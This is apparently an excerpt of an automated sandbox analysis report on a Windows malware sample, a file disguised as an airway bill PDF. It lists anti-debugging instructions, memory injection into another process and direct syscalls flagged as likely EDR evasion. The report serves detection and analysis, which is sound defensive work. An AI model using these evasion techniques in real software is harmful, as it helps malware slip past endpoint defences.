                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D60CB5 mov eax, dword ptr fs:[00000030h]5_2_24D60CB5
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D60CB5 mov eax, dword ptr fs:[00000030h]5_2_24D60CB5
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D60CB5 mov eax, dword ptr fs:[00000030h]5_2_24D60CB5
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D60CB5 mov eax, dword ptr fs:[00000030h]5_2_24D60CB5
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D60CB5 mov eax, dword ptr fs:[00000030h]5_2_24D60CB5
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D60CB5 mov eax, dword ptr fs:[00000030h]5_2_24D60CB5
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D60CB5 mov eax, dword ptr fs:[00000030h]5_2_24D60CB5
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D60CB5 mov eax, dword ptr fs:[00000030h]5_2_24D60CB5
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D60CB5 mov eax, dword ptr fs:[00000030h]5_2_24D60CB5
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D60CB5 mov eax, dword ptr fs:[00000030h]5_2_24D60CB5
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D60CB5 mov eax, dword ptr fs:[00000030h]5_2_24D60CB5
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D60CB5 mov eax, dword ptr fs:[00000030h]5_2_24D60CB5
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D2CCA0 mov ecx, dword ptr fs:[00000030h]5_2_24D2CCA0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D2CCA0 mov eax, dword ptr fs:[00000030h]5_2_24D2CCA0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D2CCA0 mov eax, dword ptr fs:[00000030h]5_2_24D2CCA0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D2CCA0 mov eax, dword ptr fs:[00000030h]5_2_24D2CCA0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CD8CB1 mov eax, dword ptr fs:[00000030h]5_2_24CD8CB1
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CD8CB1 mov eax, dword ptr fs:[00000030h]5_2_24CD8CB1
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE4C59 mov eax, dword ptr fs:[00000030h]5_2_24CE4C59
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CBAC50 mov eax, dword ptr fs:[00000030h]5_2_24CBAC50
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CBAC50 mov eax, dword ptr fs:[00000030h]5_2_24CBAC50
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CBAC50 mov eax, dword ptr fs:[00000030h]5_2_24CBAC50
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CBAC50 mov eax, dword ptr fs:[00000030h]5_2_24CBAC50
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CBAC50 mov eax, dword ptr fs:[00000030h]5_2_24CBAC50
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CBAC50 mov eax, dword ptr fs:[00000030h]5_2_24CBAC50
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB6C50 mov eax, dword ptr fs:[00000030h]5_2_24CB6C50
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB6C50 mov eax, dword ptr fs:[00000030h]5_2_24CB6C50
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB6C50 mov eax, dword ptr fs:[00000030h]5_2_24CB6C50
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC0C00 mov eax, dword ptr fs:[00000030h]5_2_24CC0C00
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC0C00 mov eax, dword ptr fs:[00000030h]5_2_24CC0C00
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC0C00 mov eax, dword ptr fs:[00000030h]5_2_24CC0C00
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC0C00 mov eax, dword ptr fs:[00000030h]5_2_24CC0C00
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CECC00 mov eax, dword ptr fs:[00000030h]5_2_24CECC00
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D34C0F mov eax, dword ptr fs:[00000030h]5_2_24D34C0F
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D54C34 mov eax, dword ptr fs:[00000030h]5_2_24D54C34
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D54C34 mov eax, dword ptr fs:[00000030h]5_2_24D54C34
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D54C34 mov eax, dword ptr fs:[00000030h]5_2_24D54C34
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D54C34 mov eax, dword ptr fs:[00000030h]5_2_24D54C34
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D54C34 mov eax, dword ptr fs:[00000030h]5_2_24D54C34
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D54C34 mov eax, dword ptr fs:[00000030h]5_2_24D54C34
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D54C34 mov ecx, dword ptr fs:[00000030h]5_2_24D54C34
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CAEC20 mov eax, dword ptr fs:[00000030h]5_2_24CAEC20
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D4CC20 mov eax, dword ptr fs:[00000030h]5_2_24D4CC20
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D4CC20 mov eax, dword ptr fs:[00000030h]5_2_24D4CC20
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D34DD7 mov eax, dword ptr fs:[00000030h]5_2_24D34DD7
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D34DD7 mov eax, dword ptr fs:[00000030h]5_2_24D34DD7
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDEDD3 mov eax, dword ptr fs:[00000030h]5_2_24CDEDD3
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDEDD3 mov eax, dword ptr fs:[00000030h]5_2_24CDEDD3
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CACDEA mov eax, dword ptr fs:[00000030h]5_2_24CACDEA
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CACDEA mov eax, dword ptr fs:[00000030h]5_2_24CACDEA
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D50DF0 mov eax, dword ptr fs:[00000030h]5_2_24D50DF0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D50DF0 mov eax, dword ptr fs:[00000030h]5_2_24D50DF0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CBADE0 mov eax, dword ptr fs:[00000030h]5_2_24CBADE0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CBADE0 mov eax, dword ptr fs:[00000030h]5_2_24CBADE0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CBADE0 mov eax, dword ptr fs:[00000030h]5_2_24CBADE0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CBADE0 mov eax, dword ptr fs:[00000030h]5_2_24CBADE0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CBADE0 mov eax, dword ptr fs:[00000030h]5_2_24CBADE0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CBADE0 mov eax, dword ptr fs:[00000030h]5_2_24CBADE0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CD0DE1 mov eax, dword ptr fs:[00000030h]5_2_24CD0DE1
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CA6DF6 mov eax, dword ptr fs:[00000030h]5_2_24CA6DF6
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDCDF0 mov eax, dword ptr fs:[00000030h]5_2_24CDCDF0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDCDF0 mov ecx, dword ptr fs:[00000030h]5_2_24CDCDF0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE6DA0 mov eax, dword ptr fs:[00000030h]5_2_24CE6DA0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CD8DBF mov eax, dword ptr fs:[00000030h]5_2_24CD8DBF
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CD8DBF mov eax, dword ptr fs:[00000030h]5_2_24CD8DBF
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D84DAD mov eax, dword ptr fs:[00000030h]5_2_24D84DAD
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D78DAE mov eax, dword ptr fs:[00000030h]5_2_24D78DAE
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D78DAE mov eax, dword ptr fs:[00000030h]5_2_24D78DAE
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CECDB1 mov ecx, dword ptr fs:[00000030h]5_2_24CECDB1
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CECDB1 mov eax, dword ptr fs:[00000030h]5_2_24CECDB1
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CECDB1 mov eax, dword ptr fs:[00000030h]5_2_24CECDB1
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB0D59 mov eax, dword ptr fs:[00000030h]5_2_24CB0D59
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB0D59 mov eax, dword ptr fs:[00000030h]5_2_24CB0D59
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB0D59 mov eax, dword ptr fs:[00000030h]5_2_24CB0D59
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB8D59 mov eax, dword ptr fs:[00000030h]5_2_24CB8D59
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB8D59 mov eax, dword ptr fs:[00000030h]5_2_24CB8D59
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB8D59 mov eax, dword ptr fs:[00000030h]5_2_24CB8D59
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB8D59 mov eax, dword ptr fs:[00000030h]5_2_24CB8D59
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB8D59 mov eax, dword ptr fs:[00000030h]5_2_24CB8D59
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D48D6B mov eax, dword ptr fs:[00000030h]5_2_24D48D6B
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D68D10 mov eax, dword ptr fs:[00000030h]5_2_24D68D10
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D68D10 mov eax, dword ptr fs:[00000030h]5_2_24D68D10
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CCAD00 mov eax, dword ptr fs:[00000030h]5_2_24CCAD00
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CCAD00 mov eax, dword ptr fs:[00000030h]5_2_24CCAD00
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CCAD00 mov eax, dword ptr fs:[00000030h]5_2_24CCAD00
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE4D1D mov eax, dword ptr fs:[00000030h]5_2_24CE4D1D
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CA6D10 mov eax, dword ptr fs:[00000030h]5_2_24CA6D10
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CA6D10 mov eax, dword ptr fs:[00000030h]5_2_24CA6D10
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CA6D10 mov eax, dword ptr fs:[00000030h]5_2_24CA6D10
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D84D30 mov eax, dword ptr fs:[00000030h]5_2_24D84D30
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D38D20 mov eax, dword ptr fs:[00000030h]5_2_24D38D20
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D66ED0 mov ecx, dword ptr fs:[00000030h]5_2_24D66ED0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB6EE0 mov eax, dword ptr fs:[00000030h]5_2_24CB6EE0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB6EE0 mov eax, dword ptr fs:[00000030h]5_2_24CB6EE0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB6EE0 mov eax, dword ptr fs:[00000030h]5_2_24CB6EE0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB6EE0 mov eax, dword ptr fs:[00000030h]5_2_24CB6EE0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE8EF5 mov eax, dword ptr fs:[00000030h]5_2_24CE8EF5
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE2E9C mov eax, dword ptr fs:[00000030h]5_2_24CE2E9C
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE2E9C mov ecx, dword ptr fs:[00000030h]5_2_24CE2E9C
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CAAE90 mov eax, dword ptr fs:[00000030h]5_2_24CAAE90
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CAAE90 mov eax, dword ptr fs:[00000030h]5_2_24CAAE90
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CAAE90 mov eax, dword ptr fs:[00000030h]5_2_24CAAE90
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D4AEB0 mov eax, dword ptr fs:[00000030h]5_2_24D4AEB0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D4AEB0 mov eax, dword ptr fs:[00000030h]5_2_24D4AEB0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D3CEA0 mov eax, dword ptr fs:[00000030h]5_2_24D3CEA0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D3CEA0 mov eax, dword ptr fs:[00000030h]5_2_24D3CEA0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D3CEA0 mov eax, dword ptr fs:[00000030h]5_2_24D3CEA0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CAEE5A mov eax, dword ptr fs:[00000030h]5_2_24CAEE5A
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D82E4F mov eax, dword ptr fs:[00000030h]5_2_24D82E4F
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D82E4F mov eax, dword ptr fs:[00000030h]5_2_24D82E4F
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D30E7F mov eax, dword ptr fs:[00000030h]5_2_24D30E7F
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D30E7F mov eax, dword ptr fs:[00000030h]5_2_24D30E7F
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D30E7F mov eax, dword ptr fs:[00000030h]5_2_24D30E7F
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB6E71 mov eax, dword ptr fs:[00000030h]5_2_24CB6E71
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDAE00 mov eax, dword ptr fs:[00000030h]5_2_24CDAE00
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDAE00 mov eax, dword ptr fs:[00000030h]5_2_24CDAE00
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDAE00 mov eax, dword ptr fs:[00000030h]5_2_24CDAE00
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDAE00 mov ecx, dword ptr fs:[00000030h]5_2_24CDAE00
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDAE00 mov eax, dword ptr fs:[00000030h]5_2_24CDAE00
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDAE00 mov eax, dword ptr fs:[00000030h]5_2_24CDAE00
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDAE00 mov eax, dword ptr fs:[00000030h]5_2_24CDAE00
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDAE00 mov eax, dword ptr fs:[00000030h]5_2_24CDAE00
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDAE00 mov eax, dword ptr fs:[00000030h]5_2_24CDAE00
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDAE00 mov eax, dword ptr fs:[00000030h]5_2_24CDAE00
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CA8E1D mov eax, dword ptr fs:[00000030h]5_2_24CA8E1D
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D46E20 mov eax, dword ptr fs:[00000030h]5_2_24D46E20
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D46E20 mov eax, dword ptr fs:[00000030h]5_2_24D46E20
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D46E20 mov ecx, dword ptr fs:[00000030h]5_2_24D46E20
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB2FC8 mov eax, dword ptr fs:[00000030h]5_2_24CB2FC8
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB2FC8 mov eax, dword ptr fs:[00000030h]5_2_24CB2FC8
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB2FC8 mov eax, dword ptr fs:[00000030h]5_2_24CB2FC8
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB2FC8 mov eax, dword ptr fs:[00000030h]5_2_24CB2FC8
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CAEFD8 mov eax, dword ptr fs:[00000030h]5_2_24CAEFD8
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CAEFD8 mov eax, dword ptr fs:[00000030h]5_2_24CAEFD8
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CAEFD8 mov eax, dword ptr fs:[00000030h]5_2_24CAEFD8
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D66FF7 mov eax, dword ptr fs:[00000030h]5_2_24D66FF7
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CCCFE0 mov eax, dword ptr fs:[00000030h]5_2_24CCCFE0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CCCFE0 mov eax, dword ptr fs:[00000030h]5_2_24CCCFE0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF0FF6 mov eax, dword ptr fs:[00000030h]5_2_24CF0FF6
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF0FF6 mov eax, dword ptr fs:[00000030h]5_2_24CF0FF6
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF0FF6 mov eax, dword ptr fs:[00000030h]5_2_24CF0FF6
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF0FF6 mov eax, dword ptr fs:[00000030h]5_2_24CF0FF6

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Allocates memory in foreign processes
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeMemory allocated: C:\Users\Public\Libraries\hdcleziT.pif base: 400000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFMemory allocated: C:\Users\Public\Libraries\hdcleziT.pif base: 400000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFMemory allocated: C:\Users\Public\Libraries\hdcleziT.pif base: 400000 protect: page execute and read and writeJump to behavior
                      Found direct / indirect Syscall (likely to bypass EDR)
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeNtClose: Direct from: 0x77382B6C
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
